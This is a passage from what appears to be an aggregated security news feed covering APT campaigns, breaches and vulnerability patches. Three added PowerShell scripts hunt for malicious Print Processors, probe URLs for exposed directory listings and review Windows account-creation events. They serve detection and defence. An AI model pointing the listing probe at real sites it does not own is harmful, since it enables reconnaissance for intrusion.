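The following script is an added example for hunting the Print Processor persistence described above; it is not code from the ESET report or from this article. It lists every Print Processor registered under the spooler’s Environments keys, returns anything other than the stock winprint entry together with the DLL it points at and that DLL’s Authenticode status, and then sweeps the prtprocs directory for sidecar files like the encrypted modules PipeMon kept there. It assumes (these are not from the article) that it runs elevated on the host under review, that a default Windows install registers only winprint -> winprint.dll, and that each Environment key’s Directory value names its subfolder under %SystemRoot%\System32\spool\prtprocs (for example x64).

```powershell
# Added example: hunt for non-standard Print Processors (PipeMon-style persistence).
# Assumptions: run as Administrator; only "winprint" -> winprint.dll is stock;
# the Environment key's "Directory" value names the prtprocs subfolder.

function Get-PrintProcessorFindings {
    [CmdletBinding()]
    param(
        # ControlSet001/002 are checked too: the malware wrote to ControlSet001
        # directly, which need not be the control set currently in use.
        [string[]]$ControlSets = @('CurrentControlSet', 'ControlSet001', 'ControlSet002')
    )

    $prtprocsRoot = Join-Path $env:SystemRoot 'System32\spool\prtprocs'
    $findings = New-Object System.Collections.Generic.List[object]

    foreach ($cs in $ControlSets) {
        $envRoot = "HKLM:\SYSTEM\$cs\Control\Print\Environments"
        if (-not (Test-Path -Path $envRoot)) { continue }

        foreach ($envKey in Get-ChildItem -Path $envRoot) {
            $envDir = (Get-ItemProperty -Path $envKey.PSPath -ErrorAction SilentlyContinue).Directory
            $ppRoot = "$($envKey.PSPath)\Print Processors"
            if (-not (Test-Path -Path $ppRoot)) { continue }

            foreach ($pp in Get-ChildItem -Path $ppRoot) {
                $driver = (Get-ItemProperty -Path $pp.PSPath -ErrorAction SilentlyContinue).Driver
                # The only entry a clean system should have.
                if ($pp.PSChildName -ieq 'winprint' -and $driver -ieq 'winprint.dll') { continue }

                # Resolve the DLL the spooler would load for this entry.
                $dllPath = $null
                if ($envDir -and $driver) {
                    $dllPath = Join-Path (Join-Path $prtprocsRoot $envDir) $driver
                }
                $onDisk = [bool]($dllPath -and (Test-Path -LiteralPath $dllPath))
                $sig = if ($onDisk) { Get-AuthenticodeSignature -FilePath $dllPath } else { $null }

                $findings.Add([pscustomobject]@{
                    ControlSet  = $cs
                    Environment = $envKey.PSChildName
                    Processor   = $pp.PSChildName
                    Driver      = $driver
                    DllPath     = $dllPath
                    OnDisk      = $onDisk
                    Signature   = if ($sig) { $sig.Status.ToString() } else { 'n/a' }
                    Signer      = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { 'n/a' }
                    RegistryKey = $pp.Name
                })
            }
        }
    }
    return $findings
}

function Get-PrintProcessorSidecars {
    # Every file in the prtprocs tree other than winprint.dll: PipeMon stored its
    # loader and its encrypted modules here under innocuous names.
    $prtprocsRoot = Join-Path $env:SystemRoot 'System32\spool\prtprocs'
    Get-ChildItem -Path $prtprocsRoot -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -ine 'winprint.dll' } |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            [pscustomobject]@{
                Path          = $_.FullName
                Bytes         = $_.Length
                LastWriteTime = $_.LastWriteTime
                Signature     = $sig.Status.ToString()
                Signer        = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { 'n/a' }
            }
        }
}

Get-PrintProcessorFindings | Format-Table -AutoSize
Get-PrintProcessorSidecars  | Format-Table -AutoSize
```

Treat the output as a review list rather than a verdict: a printer vendor may legitimately register its own processor, so a finding with a valid signature from a known vendor can be closed quickly, while an unsigned DLL, a certificate from an unrelated company (the article notes PipeMon was signed with a stolen game company certificate) or a non-DLL file sitting in prtprocs deserves a closer look. Do not trust the key name either: the names in the article mimic legitimate Windows components (PrintFilterPipelineSvc, lltdsvc), which is exactly why the check keys on the Driver value and the file on disk.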

Experts also spotted an updated version of PipeMon for which they were able to retrieve the first stage. Its architecture is highly similar to the original variant, but its code was rewritten from scratch.

“Once again, the Winnti Group has targeted video game developers in Asia with a new modular backdoor signed with a code-signing certificate likely stolen during a previous campaign and sharing some similarities with the PortReuse backdoor. This new implant shows that the Winnti Group is still actively developing new tools using multiple open source projects; they don’t rely solely on their flagship backdoors, ShadowPad and the Winnti malware.” concludes ESET.

Pierluigi Paganini

(SecurityAffairs – Winnti, hacking)

The post Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry appeared first on Security Affairs.

Santander, one of the biggest European banks, was leaking sensitive data on their website

Santander Consumer Bank, the Belgian branch of the bank, had a misconfiguration in its blog domain that allowed its files to be indexed.

Our new research recently discovered a security issue with Santander, the 5th largest bank in Europe and the 16th largest in the world. This Spanish multinational bank controls approximately $1.4 trillion in total assets globally, and has a $69.9 billion total market capitalization on the Euro Stoxx 50 stock market index.

Our analysts found that the Belgian branch, Santander Consumer Bank, has a misconfiguration in its blog domain, allowing its files to be indexed. 

When we looked through these files, we were able to see sensitive information, including an SQL dump and a JSON file that could be used by hackers to potentially phish Santander’s bank customers.

We contacted Santander immediately when we discovered the misconfiguration on April 15.  Representatives from the leading European bank responded to our emails and seem to have fixed the issue, as we are presently unable to access the information.

A Santander Consumer spokesperson said:

“The incident highlighted relates specifically to the Santander Consumer Bank Belgium blog only. The blog contains only public information and articles, and therefore no customer data or critical information from the blog has been compromised. Our security team has already fixed the issue to ensure the blog is secure.”

What exactly is wrong with the Santander website?

When we visited the Santander blog on its Belgian domain, we noticed that the www endpoint of the blog subdomain had a misconfiguration that allowed all of its files to be indexed by search engines.

Included in these indexed files was an important info.json file that seemed to contain its Cloudfront API keys.

CloudFront is a content delivery network (CDN) operated by Amazon. Websites use CDNs to host large files, such as videos, PDFs, large images and other static content, that would otherwise slow down their own servers. Because these large files are served from the CDN instead, websites load faster for users.

If a hacker got hold of Santander’s apparent CloudFront API keys, they would be able to replace the content served through CloudFront with content of their own.

For example, if a PDF or Word document hosted on CloudFront contained sensitive information, such as which accounts a customer should send money to, the hacker could swap that document for their own version. In that way, they could change the real account number to one they control and steal the customer’s money.

If a static HTML file was hosted there, the hacker could replace it with an entire webpage, creating a phishing page to steal the user’s financial information while it is served from Santander’s official Belgian domain.
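The probe below is an added example for the misconfiguration described above and is not code from the CyberNews research or from this article: it requests a directory URL, decides whether the server answered with an auto-generated listing, and pulls out entries such as an SQL dump or an info.json that should never be reachable from a blog directory. The target URLs are hypothetical placeholders. It assumes (not from the article) that listings use the Apache/nginx “Index of /” or IIS “[To Parent Directory]” format and that the extensions listed are the ones worth escalating.

```powershell
# Added example: detect an exposed directory listing and the sensitive files in it.
# Assumptions: Apache/nginx/IIS listing formats; URLs below are placeholders.

function Test-DirectoryListing {
    param(
        [Parameter(Mandatory)][string]$Url,
        [string[]]$SensitiveExtensions = @('.json', '.sql', '.env', '.bak', '.zip', '.gz', '.tar', '.log')
    )

    try {
        $resp = Invoke-WebRequest -Uri $Url -UseBasicParsing -ErrorAction Stop
    } catch {
        # A 403 here is what a fixed server returns (the "Forbidden" page quoted
        # further down in the article); a 404 just means nothing is at that path.
        return [pscustomobject]@{ Url = $Url; Status = $_.Exception.Message; Listing = $false; Files = @(); Sensitive = @() }
    }

    $body = $resp.Content
    $isListing = ($body -match '<title>\s*Index of ') -or
                 ($body -match '\[To Parent Directory\]') -or
                 ($body -match '>Parent Directory<')

    $files = @()
    if ($isListing) {
        # Keep hrefs that are entries of this directory; drop the column-sort
        # links (?C=N;O=D), absolute paths, the parent link and anchors.
        $files = @($resp.Links | ForEach-Object { $_.href } |
                   Where-Object { $_ -and $_ -notmatch '^(\?|/|\.\./|#|https?://)' })
    }
    $sensitive = @($files | Where-Object {
        $SensitiveExtensions -contains [System.IO.Path]::GetExtension(($_ -split '\?')[0])
    })

    [pscustomobject]@{
        Url       = $Url
        Status    = [int]$resp.StatusCode
        Listing   = $isListing
        Files     = $files
        Sensitive = $sensitive
    }
}

# Hypothetical targets: the blog root and an uploads folder, two places where a
# listing is commonly left enabled.
'https://blog.example.com/', 'https://blog.example.com/wp-content/uploads/' |
    ForEach-Object { Test-DirectoryListing -Url $_ } |
    Format-List Url, Status, Listing, Sensitive
```

A listing is a finding on its own, even when nothing sensitive shows up, because it hands an attacker a complete inventory of the directory. The server-side fix is to turn automatic indexing off (Apache: `Options -Indexes`, nginx: `autoindex off;`), keep dumps and configuration files out of the web root altogether, and, where a file with credentials has already been exposed, treat those credentials as compromised and rotate them rather than relying on the 403.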

How to protect yourself

On April 15, we notified Santander’s Belgian website of the misconfiguration, and on April 24 they responded and seem to have fixed the issue. Their CyberSecurity Team stated: “We take cyber security seriously and strive to maintain the highest security standards and best practices and welcome responsible disclosure attitudes in security researchers.”

When we checked for the misconfiguration again on April 27, we received the following message:

Forbidden

You don’t have permission to access this resource.

For Santander’s customers, as well as all other banking customers, we’d recommend that you always check the domain and subdomain that a suspicious bank email is sending you to. Make sure that the domain is the bank’s real domain, but also know that important financial information requests would never be hosted on the blog subdomain of a bank.

Editor’s note: this article was updated on May 19 to reflect new information in collaboration with BitSight that the keys may not have been active Cloudfront API keys at the time of our discovery.

Original post:

https://cybernews.com/security/one-of-biggest-european-banks-leaking-sensitive-data-on-website/

About the author: Bernard Meyer

Bernard Meyer is the Senior Researcher at CyberNews. He has a strong passion for security in popular software, maximizing privacy online, and keeping an eye on governments and corporations. He’s been featured in Fortune, Forbes, Wired, Mirror, TechRadar and more. You can usually find him on Twitter arguing with someone about something moderately important.

Pierluigi Paganini

(SecurityAffairs – Santander, hacking)

The post Santander, one of the biggest European banks, was leaking sensitive data on their website appeared first on Security Affairs.

Meal delivery service Home Chef discloses data breach

Meal delivery service Home Chef has confirmed that it recently suffered a security breach that exposed its customer information.

Meal delivery service Home Chef has disclosed a data breach that exposed its customer information. Home Chef also explained that only a portion of its customers were impacted in the security incident.

In early May, the Shiny Hunters hacking group started offering for sale databases containing tens of millions of user records from 11 companies.

Below is the complete list published by BleepingComputer:

Company                             User records   Price
Tokopedia                           91 million     $5,000
Home Chef                           8 million      $2,500
Bhinneka                            1.2 million    $1,200
Minted                              5 million      $2,500
Styleshare                          6 million      $2,700
Ggumim                              2 million      $1,300
Mindful                             2 million      $1,300
StarTribune                         1 million      $1,100
ChatBooks                           15 million     $3,500
The Chronicle Of Higher Education   3 million      $1,500
Zoosk                               30 million     $500

At the time, the Shiny Hunters were offering the Home Chef database, more than 8 million records, for $2,500.

Now the company confirmed the data breach, saying that the incident has impacted select customer information.

Exposed data includes email addresses, names, phone numbers, hashed passwords, and the last four digits of credit card numbers.

“Was My Credit Card Information Compromised? Home Chef does not store complete credit or debit card information” reads the FAQ published by the company.

“Information such as frequency of deliveries and mailing address may also have been compromised.”

Home Chef also underlined the fact that it does not store complete credit or debit card information. The company is investigating the incident and announced that it is taking action to strengthen its security defenses and prevent similar incidents in the future.

Although the company stores passwords in hashed form, it recommends that users change their password out of an abundance of caution by following this process:

  1. Visit www.homechef.com
  2. Click on “Log in”
  3. Click on “Account Information”, which is located under the “Account” dropdown menu
  4. Complete the “Change Your Password” section and click “Save your settings.” There’s no need to adjust the other sections on the Account page (e.g. “Subscription”)

Home Chef users should remain vigilant against phishing attacks and suspicious activity in their accounts.

The company is notifying the impacted users of the incident.

Pierluigi Paganini

(SecurityAffairs – HomeChef, hacking)

The post Meal delivery service Home Chef discloses data breach appeared first on Security Affairs.

Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia

Cybersecurity researchers uncovered an Iranian cyber espionage campaign conducted by the Chafer APT group and aimed at critical infrastructure in Kuwait and Saudi Arabia.

Cybersecurity researchers from Bitdefender published a detailed report on an Iranian cyber espionage campaign directed against critical infrastructure in Kuwait and Saudi Arabia.

The cyber espionage campaigns were carried out by Iran-linked Chafer APT (also known as APT39 or Remix Kitten).

The Chafer APT group has distributed data-stealing malware since at least mid-2014; it focuses on surveillance operations and the tracking of individuals.

The APT group targets telecommunication and travel industries in the Middle East to gather intelligence on Iran’s geopolitical interests.

“Victims of the analyzed campaigns fit into the pattern preferred by this actor, such as air transport and government sectors in the Middle East,” reads the research paper published by the experts.

“Some traces indicate that the goal of the attack was data exploration and exfiltration (on some of the victim’s tools such as Navicat, Winscp, found in an unusual location, namely “%WINDOWS%\ime\en-us-ime”, or SmartFtpPasswordDecryptor were present on their systems).”

The attackers used several tools, including ‘living off the land’ tools, making it hard to attribute the attack to specific threat actors, as well as a custom-built backdoor.

The attacks against entities in Kuwait and Saudi Arabia have multiple similarities and share some common stages, but the experts noticed that the attacks against victims in Kuwait appear more focused and sophisticated.

Chafer APT launched spear-phishing attacks, the messages were used to deliver multiple backdoors that allowed them to gain a foothold, elevate their privileges, conduct internal reconnaissance, and establish persistence in the victim environment.

“Once the victims were compromised, attackers started to bring reconnaissance tools for network scanning (“xnet.exe”, “shareo.exe”) and credential gathering (as “mnl.exe” or “mimi32.exe”) or tools with multiple functionalities, such as CrackMapExec (for users’ enumeration, share listing, credentials harvesting and so on).” continues the report.

“During our investigation, on some of the compromised stations we observed some unusual behavior performed under a certain user account, leading us to believe the attackers managed to create a user account on the victims’ machine and performed several malicious actions inside the network, using that account.”

The attacks against entities in Kuwait appeared more sophisticated: the attackers created a user account on the compromised machines and performed malicious actions inside the network, including credential harvesting with Mimikatz and lateral movement using multiple tools from their arsenal.

Most of the hacking activity occurred on Fridays and Saturdays, coinciding with the weekend in the Middle East.
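The script below is an added example, not code from the Bitdefender report or from this article, for hunting the two behaviours just described: accounts created by the attackers on compromised hosts, and activity clustered on Friday and Saturday. It assumes (not from the article) that the Security log is readable (run elevated), that event ID 4720 is “A user account was created” and 4732 is “A member was added to a security-enabled local group”, that their EventData carries SubjectUserName, TargetUserName and, for 4732, MemberName, and it takes the weekend days as a parameter because they differ by region.

```powershell
# Added example: local account creations / group additions, flagged by weekend day.
# Assumptions: Security log readable; 4720 = account created, 4732 = member
# added to a security-enabled local group; weekend days vary by region.

function Get-WeekendAccountActivity {
    param(
        [int]$Days = 90,
        [System.DayOfWeek[]]$WeekendDays = @('Friday', 'Saturday'),
        [string]$ComputerName = $env:COMPUTERNAME,
        [switch]$IncludeWeekdays   # return every event, with the Weekend flag set
    )

    $filter = @{
        LogName   = 'Security'
        Id        = @(4720, 4732)
        StartTime = (Get-Date).AddDays(-$Days)
    }

    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Pull the named EventData fields out of the event XML.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

            [pscustomobject]@{
                Time    = $_.TimeCreated
                Day     = $_.TimeCreated.DayOfWeek
                Weekend = [bool]($WeekendDays -contains $_.TimeCreated.DayOfWeek)
                Host    = $_.MachineName
                EventId = $_.Id
                Action  = if ($_.Id -eq 4720) { 'account created' } else { 'added to local group' }
                Subject = $data['SubjectUserName']   # who performed the action
                Target  = $data['TargetUserName']    # new account (4720) or group name (4732)
                Member  = $data['MemberName']        # account added to the group (4732 only)
            }
        } |
        Where-Object { $IncludeWeekdays -or $_.Weekend }
}

# Weekend account creations and group additions in the last 90 days, followed by
# a per-day count of all such events to see whether activity clusters.
$events = Get-WeekendAccountActivity -IncludeWeekdays
$events | Where-Object Weekend | Sort-Object Time | Format-Table -AutoSize
$events | Group-Object Day | Select-Object Name, Count | Sort-Object Count -Descending
```

Run it against each host in scope (the -ComputerName parameter) or, better, against centralised logs. An account created on a Friday night by an administrator who was not on duty, then added to Administrators or Remote Desktop Users, is the pattern the report describes; an account created by a provisioning system on a weekday is noise, which is why the day histogram and the Subject column are there to separate the two.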

The campaign against a Saudi Arabian entity was characterized by the heavy use of social engineering to trick the victim into executing a remote administration tool (RAT). The RAT employed in the attacks shares similarities with those used against Kuwait and Turkey.

“The case investigated in Saudi Arabia was not as elaborate, either because the attackers did not manage to further exploit the victim, or because the reconnaissance revealed no information of interest.” continues the report.

“While this attack was not as extensive as the one in Kuwait, some forensic evidence suggests that the same attackers might have orchestrated it. Despite the evidence for network discovery, we were not able to find any traces for lateral movement, most probably because threat actors were not able to find any vulnerable machines.”

The campaigns against Kuwait and Saudi Arabia demonstrate the intense cyberespionage activity carried out by Iran-linked APT groups in the Middle East. We also cannot underestimate that these hacking groups are extending their range of action, targeting governments and organizations worldwide.

Pierluigi Paganini

(SecurityAffairs – Chafer APT, hacking)

The post Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia appeared first on Security Affairs.

VMware fixes CVE-2020-3956 Remote Code Execution issue in Cloud Director

VMware has addressed a high-severity remote code execution vulnerability, tracked as CVE-2020-3956, that affects its Cloud Director product.

VMware has patched a high-severity remote code execution vulnerability, tracked as CVE-2020-3956, in its Cloud Director product.

The vulnerability is a code injection issue that could be exploited by an authenticated attacker who sends malicious traffic to Cloud Director, leading to arbitrary code execution.

“A code injection vulnerability in VMware Cloud Director was privately reported to VMware. Patches and workarounds are available to remediate or workaround this vulnerability in affected VMware products.” reads the security advisory published by VMware.

“An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.”

According to the company, the vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.

The vulnerability impacts VMware Cloud Director 10.0.x, 9.7.x and 9.5.x on Linux and Photon OS appliances, and version 9.1.x on Linux. Versions 8.x, 9.0.x and 10.1.0 are not affected.

VMware vCloud Director versions 9.1.0.4, 9.5.0.6, 9.7.0.5 and 10.0.0.2 address the issue. VMware has also released a workaround to mitigate the risk of attacks exploiting the issue.

The vulnerability was discovered by Tomáš Melicher and Lukáš Václavík of Citadelo.

A couple of weeks ago, VMware addressed vulnerabilities impacting the vRealize Operations Manager (vROps) product, including two recently disclosed Salt issues.

Earlier this month, VMware addressed a critical information disclosure flaw, tracked as CVE-2020-3952, that could be exploited by attackers to compromise vCenter Server or other services that use the Directory Service (vmdir) for authentication.

The CVE-2020-3952 vulnerability received a CVSSv3 score of 10; it resides in vCenter Server version 6.7 on Windows and virtual appliances.

Pierluigi Paganini

(SecurityAffairs – CVE-2020-3956, hacking)

The post VMware fixes CVE-2020-3956 Remote Code Execution issue in Cloud Director appeared first on Security Affairs.

Adobe fixed several memory corruption issues in some of its products

Adobe addressed multiple memory corruption vulnerabilities, including one that allows arbitrary code execution, in several of its products.

Adobe addressed multiple memory corruption vulnerabilities in several of its products, including one that allows arbitrary code execution.

The issues affect Character Animator, Premiere Rush, Premiere Pro, and Audition; they were reported to Adobe by researcher Mat Powell of Trend Micro’s Zero Day Initiative (ZDI).

Bulletin    Title                                                    Originally posted   Last updated
APSB20-29   Security update available for Adobe Premiere Rush        05/19/2020          05/19/2020
APSB20-28   Security update available for Adobe Audition             05/19/2020          05/19/2020
APSB20-27   Security update available for Adobe Premiere Pro         05/19/2020          05/19/2020
APSB20-25   Security update available for Adobe Character Animator   05/19/2020          05/19/2020

The most serious flaw, tracked as CVE-2020-9586, is a critical stack-based buffer overflow affecting the Windows and macOS versions of Adobe Character Animator.

The vulnerability could be exploited by a remote attacker to execute arbitrary code.

“Adobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves a stack-based buffer overflow vulnerability that could lead to remote code execution.” reads the advisory published by Adobe.

Adobe also addressed an out-of-bounds read vulnerability in Adobe Premiere Rush for Windows and macOS that could lead to information disclosure.

The IT giant has released security updates for Adobe Premiere Pro for Windows and macOS that addressed an out-of-bounds read vulnerability that could lead to information disclosure.

The remaining bulletin, APSB20-28, covers Adobe Audition for Windows and macOS.

The good news is that Adobe is not aware of attacks in the wild exploiting the above vulnerabilities and assigned them a priority rating of 3, meaning the affected products have historically not been targeted by attackers.

At the beginning of this month Adobe released security updates to address 36 vulnerabilities in Adobe Acrobat, Reader, and Adobe DNG Software Development Kit.

Pierluigi Paganini

(SecurityAffairs – memory corruption flaws, hacking)

The post Adobe fixed several memory corruption issues in some of its products appeared first on Security Affairs.

Israel is suspected to be behind the cyberattack on Iranian port

Israel is likely behind the recent cyberattack which disrupted some operations at Iran’s Shahid Rajaei Port, located near the Strait of Hormuz.

A couple of weeks ago, Iranian officials announced that hackers damaged a small number of systems at the port of Shahid Rajaei in the city of Bandar Abbas.

Bandar Abbas is the capital of Hormozgān Province on the southern coast of Iran, on the Persian Gulf. The city occupies a strategic position on the narrow Strait of Hormuz, and it is the location of the main base of the Iranian Navy. Bandar Abbas is also the capital and largest city of Bandar Abbas County.

Iranian officials did not reveal details of the cyber attack, which took place on May 9, two days before the incident was disclosed.

Local authorities, including the Ports and Maritime Organization (PMO) in the state of Hormozgan, confirmed that operations at the port were impacted by the cyber attack.

Initially, officials denied the cyber attack, but under media pressure they later admitted the intrusion.

The authorities did not attribute the attack to a specific threat actor, Iran’s Deputy Minister of Roads and Urban Development stated that he did not have any information about the origin of the attack.

“Currently, the distribution of cargo in northern ports is good; although the performance of all southern ports is negative,” said Mohammad Rastad.

Rastad told the Fars News Agency that the attack was carried out by a foreign government.

Now a foreign government security official said the attack was “highly accurate” and the damages caused to the Iranian infrastructure were greater than described in official Iranian accounts.

The news was reported by The Washington Post, which blamed Israel for the cyber attack that was launched in retaliation for an earlier cyberattack on rural water distribution systems in Israel.

In April, the Israeli government issued an alert to organizations in the water sector following a series of cyberattacks that targeted water facilities.

In early May, Israel’s security cabinet discussed an alleged Iranian cyberattack on Israeli water and sewage facilities that did not cause serious damage. The attack represents an escalation by the Iranians because it targeted civilian infrastructure.

“This was a very unordinary cyberattack against civilian water facilities which is against every ethic and every code even in times of war,” a senior Israeli official told Channel 13. “We didn’t expect this even from the Iranians. It is just not done.”

Iran reported three cyberattacks within one week back in December. At least one of the attacks was allegedly “state-sponsored.”

Israel’s National Cyber Directorate announced to have received reports of cyber attacks aimed at supervisory control and data acquisition (SCADA) systems at wastewater treatment plants, pumping stations and sewage facilities.

The recent attack could be the response of Israel’s cyber forces to the wave of attacks that targeted the Israeli water sector.

“Israel appears to be behind a cyberattack earlier this month on computers at Iran’s Shahid Rajaee port that caused massive backups on waterways and roads leading to the facility, the Washington Post reported on Monday.” reads the report published by the Reuters.

“Citing unnamed U.S. and foreign government officials, the Post said the May 9 disruption of Iranian computers was presumably in retaliation for an earlier attempted cyberattack on rural water distribution systems in Israel.”

Reuters contacted the Israeli Embassy in Washington for comment, but it has yet to respond.

In December 2019, Iran foiled two massive cyber-attacks in less than a week, the country’s telecommunications minister Mohammad Javad Azari-Jahromi revealed.

The news was reported by both the ISNA and Mehr news agencies, the Iranian minister defined the attacks as “really massive” and attributed them to a nation-state actor.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Israel is suspected to be behind the cyberattack on Iranian port appeared first on Security Affairs.

Researchers disclose five Microsoft Windows zero-days

Security experts have disclosed five unpatched vulnerabilities in Microsoft Windows, four of which rated as high-risk severity.

Security experts from Trend Micro’s Zero Day Initiative (ZDI) have published information on five unpatched vulnerabilities in Microsoft Windows.

Four of the vulnerabilities are classified as high-risk; three of them, tracked as CVE-2020-0916, CVE-2020-0986 and CVE-2020-0915, are privilege escalation flaws that received a CVSS score of 7.0.

These three flaws reside in the user-mode printer driver host process splwow64.exe and are caused by the lack of validation of user-supplied input before it is dereferenced as a pointer.

The fourth issue, also in splwow64.exe, is a low-severity information disclosure vulnerability with the same root cause: a user-supplied value is dereferenced as a pointer without validation.

ZDI reported the issues to Microsoft in December 2019, but the tech giant did not address them in the May 2020 Patch Tuesday.

The last zero-day vulnerability disclosed by Trend Micro’s Zero Day Initiative (ZDI) is a privilege escalation vulnerability in the handling of WLAN connection profiles.  

“This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.” reads the advisory published by Trend Micro.

“The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute code in the context of the current user at medium integrity.”

Pierluigi Paganini

(SecurityAffairs – Microsoft Windows, hacking)

The post Researchers disclose five Microsoft Windows zero-days appeared first on Security Affairs.

Three flaws in Nitro Pro PDF reader expose businesses to hack

Two of three vulnerabilities found in the Nitro Pro PDF editor could be exploited by threat actors to execute code remotely on vulnerable hosts.

Security experts from Cisco Talos have discovered three vulnerabilities in the Nitro Pro PDF editor, two of which rated as critical (CVSS score of 8.8) could be exploited by attackers for remote code execution.

Nitro Pro is a PDF application designed for creating, reading, editing, signing, converting, and protecting PDFs. The software is part of Nitro Software’s suite of enterprise tools, used by tens of thousands of organizations.


The first issue, tracked as CVE-2020-6074, is a nested pages remote code execution vulnerability that resides in the PDF parser of Nitro Pro. An attacker could exploit it by tricking the victim into opening a specially crafted PDF that triggers a use-after-free condition.

“An exploitable code execution vulnerability exists in the PDF parser of Nitro Pro 13.9.1.155. A specially crafted PDF document can cause a use-after-free which can lead to remote code execution. An attacker can provide a malicious file to trigger this vulnerability.” reads the advisory published by the company.

The second vulnerability, tracked as CVE-2020-6092, is a Pattern object code execution vulnerability that resides in the way Nitro Pro 13.9.1.155 parses Pattern objects. An attacker could exploit the flaw by tricking the victim into opening a specially crafted PDF that triggers an integer overflow, leading to remote code execution.

“An exploitable code execution vulnerability exists in the way Nitro Pro 13.9.1.155 parses Pattern objects. A specially crafted PDF file can trigger an integer overflow that can lead to arbitrary code execution. A victim must open a malicious file to trigger this vulnerability” continues the advisory.

The third flaw, tracked as CVE-2020-6093 and carrying a CVSS score of 6.5, is a JavaScript XML error handling information disclosure vulnerability.

The vulnerability exists in the way version 13.9.1.155 handles XML errors; an attacker could exploit it by tricking the victim into opening a specially crafted PDF document that causes uninitialized memory access and consequent information disclosure.

In early May, the software vendor released a security update that addresses the above vulnerabilities.

Pierluigi Paganini

(SecurityAffairs – PDF, hacking)

The post Three flaws in Nitro Pro PDF reader expose businesses to hack appeared first on Security Affairs.

Bluetooth BIAS attack threatens billions of devices

Researchers disclosed a security flaw in Bluetooth, dubbed BIAS, that could potentially be exploited by an attacker to spoof a previously paired device.

Researchers from École Polytechnique Fédérale de Lausanne (EPFL) discovered a vulnerability in Bluetooth, dubbed Bluetooth Impersonation AttackS or BIAS, that could potentially be exploited by an attacker to spoof a remotely paired device.

The issue potentially impacts over a billion devices.

“To establish an encrypted connection, two Bluetooth devices must pair with each other using a link key. It is possible for an unauthenticated, adjacent attacker to impersonate a previously paired/bonded device and successfully authenticate without knowing the link key. This could allow an attacker to gain full access to the paired device by performing a Bluetooth Impersonation Attack (BIAS).” reads the vulnerability note VU#647177.

The Bluetooth specification is affected by security flaws that could allow attackers to carry out impersonation attacks while establishing a secure connection.

For a BIAS attack to succeed, the attacker must be within wireless range of a vulnerable Bluetooth device that has previously established a BR/EDR bond with a remote device whose Bluetooth address is known to the attacker.

To establish an encrypted connection, two Bluetooth devices must pair with each other using a link key, also known as the long-term key.

The experts explained that the flaw results from how two previously paired devices handle the link key. The link key is used to authenticate, and derive encryption for, every subsequent connection between the two devices without repeating the pairing.

The experts discovered that an unauthenticated attacker within wireless range of a target Bluetooth device can spoof the address of a previously paired remote device and successfully complete the authentication procedure with some paired/bonded devices without knowing the link key.

“The Bluetooth standard includes a legacy authentication procedure and a secure authentication procedure, allowing devices to authenticate to each other using a long term key. Those procedures are used during pairing and secure connection establishment to prevent impersonation attacks. In this paper, we show that the Bluetooth specification contains vulnerabilities enabling to perform impersonation attacks during secure connection establishment.” reads the research paper. “Such vulnerabilities include the lack of mandatory mutual authentication, overly permissive role switching, and an authentication procedure downgrade.”

The researchers reported their findings to the Bluetooth Special Interest Group (SIG), in December 2019.

“The researchers identified that it is possible for an attacking device spoofing the address of a previously bonded remote device to successfully complete the authentication procedure with some paired/bonded devices while not possessing the link key. This may permit an attacker to negotiate a reduced encryption key strength with a device that is still vulnerable to the Key Negotiation of Bluetooth attack disclosed in 2019.” reads the advisory published by the Bluetooth SIG. “If the encryption key length reduction is successful, an attacker may be able to brute force the encryption key and spoof the remote paired device. If the encryption key length reduction is unsuccessful, the attacker will not be able to establish an encrypted link but may still appear authenticated to the host.”

Experts explained that by combining the BIAS attack with other attacks, such as the KNOB (Key Negotiation of Bluetooth) attack, an attacker can brute-force the encryption key and use it to decrypt communications.

“The BIAS and KNOB attacks can be chained to impersonate a Bluetooth device, complete authentication without possessing the link key, negotiate a session key with low entropy, establish a secure connection, and brute force the session key” states the paper.

Experts tested the attack against as many as 30 Bluetooth devices and found all of them to be vulnerable to BIAS attacks.

The Bluetooth SIG has responded to the vulnerability by announcing changes that will be introduced in a future revision of the specification.

The SIG recommends that Bluetooth users install the latest updates from their device and operating system manufacturers.

“The BIAS attacks are the first uncovering issues related to Bluetooth’s secure connection establishment authentication procedures, adversarial role switches, and Secure Connections downgrades,” the paper concludes. “The BIAS attacks are stealthy, as Bluetooth secure connection establishment does not require user interaction.”

Pierluigi Paganini

(SecurityAffairs – BIAS attack, hacking)

The post Bluetooth BIAS attack threatens billions of devices appeared first on Security Affairs.

Easyjet hacked: 9 million customer’s data exposed along with 2,200+ credit card details

British airline EasyJet announced it was the victim of a “highly sophisticated” cyber attack that exposed email addresses and travel details of around 9 million of its customers.

British airline EasyJet announced that a “highly sophisticated” cyber-attack exposed email addresses and travel details of around 9 million of its customers.

“Following discussions with the Information Commissioner’s Office (“ICO”), the Board of easyJet announces that it has been the target of an attack from a highly sophisticated source.” reads a statement from the company. “Our investigation found that the email address and travel details of approximately 9 million customers were accessed.” 

According to the company, for a small subset of customers the hackers also obtained credit card details (2,208 of them); no passport details were exposed.

“Our forensic investigation found that, for a very small subset of customers (2,208), credit card details were accessed.” continues the company.

At the time of writing the airline had not disclosed details of the security breach; it is not clear when the incident took place or how EasyJet discovered the intrusion.


EasyJet conducted a forensic investigation and, once it identified the unauthorized access, locked it out.

